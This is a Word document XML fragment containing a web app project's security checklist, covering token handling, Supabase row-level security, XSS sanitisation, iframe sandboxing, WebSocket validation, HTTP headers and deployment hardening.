    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkStart w:id="111" w:name="security-checklist"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Gate every phase against this checklist.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">No phase is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unless these items are verified.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="103" w:name="token-secret-handling"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Token &amp; Secret Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Gateway tokens NEVER stored in localStorage or sessionStorage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Gateway tokens encrypted at rest in Supabase (pgcrypto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Gateway tokens NEVER appear in URL query parameters (except transiently in quick-connect, immediately scrubbed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Gateway tokens NEVER logged to console (even in debug mode)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NEVER referenced in client-side code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Device tokens (issued by Gateway, scoped + rotatable) are the ONLY tokens acceptable in localStorage</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:id="104" w:name="authentication-authorization"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentication &amp; Authorization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Supabase auth middleware on all protected routes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ RLS enabled on EVERY table (gateway_connections, projects, messages, artifacts)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ RLS policies tested with cross-user queries (must return zero rows)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Session JWT validated server-side (via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">supabase.auth.getUser()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getSession()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Password minimum length ≥ 8 characters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052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 assertions that bypass auth checks</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:bookmarkStart w:id="105" w:name="xss-prevention"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS Prevention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rehype-sanitize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with custom strict schema on EVERY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ReactMarkdown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">render</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Custom sanitize schema blocks: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&lt;button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Link protocols restricted to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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ All external links:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">target="_blank" rel="noopener noreferrer"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Zero uses of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outside of controlled sandboxed iframes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053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Function()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document.write()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">anywhere in the codebase</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="105"/>
    <w:bookmarkStart w:id="106" w:name="iframe-sandbox-html-artifacts"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Iframe Sandbox (HTML Artifacts)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sandbox="allow-scripts"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">only — NO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow-same-origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Injected CSP:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect-src 'none'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(blocks all network requests from iframe)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Injected CSP:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">form-action 'none'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(blocks form submissions)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referrerPolicy="no-referrer"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on all iframes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allow=""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attribute (blocks camera, microphone, etc.)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="106"/>
    <w:bookmarkStart w:id="107" w:name="websocket-security"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WebSocket Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Gateway URL validated before connection (must be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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Token sent in handshake body, NEVER as URL query parameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ All incoming frames validated for expected shape before processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Unknown frame types silently dropped (fail closed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Content size bounded (reject deltas &gt; 1MB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Non-localhost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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">connections show security warning to user</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="107"/>
    <w:bookmarkStart w:id="108" w:name="http-security-headers"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP Security Headers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set with restrictive policy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(prevents clickjacking)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X-Content-Type-Options: nosniff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with max-age ≥ 31536000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disabling unused browser features</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Headers verified at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId94">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">securityheaders.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">post-deploy</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkStart w:id="109" w:name="input-validation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Project names: trimmed, max 100 chars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Project icons: max 8 chars (single emoji)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Project colors: validated as hex color</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Session keys: always derived from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">agent:main:clawspace:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ crypto UUID (never user-provided)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Message content: no maximum enforced client-side (Gateway handles limits), but bounded in streaming buffer</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="110" w:name="deployment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Docker container runs as non-root user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in all deployed environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ No debug endpoints or development-only routes in production build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Service role key marked as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sensitive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in Vercel dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ HTTPS enforced in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Plan v1.1 — February 3, 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Derived from BUILD-BRIEF.md + actual OpenClaw Gateway source code analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Priority: Security → Ease of use → UX/UI</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110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4" Target="https://securityheaders.com" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="https://supabas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securityheaders.com" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="https://supabas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2026-02-04T09:05:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-04T09:05:20Z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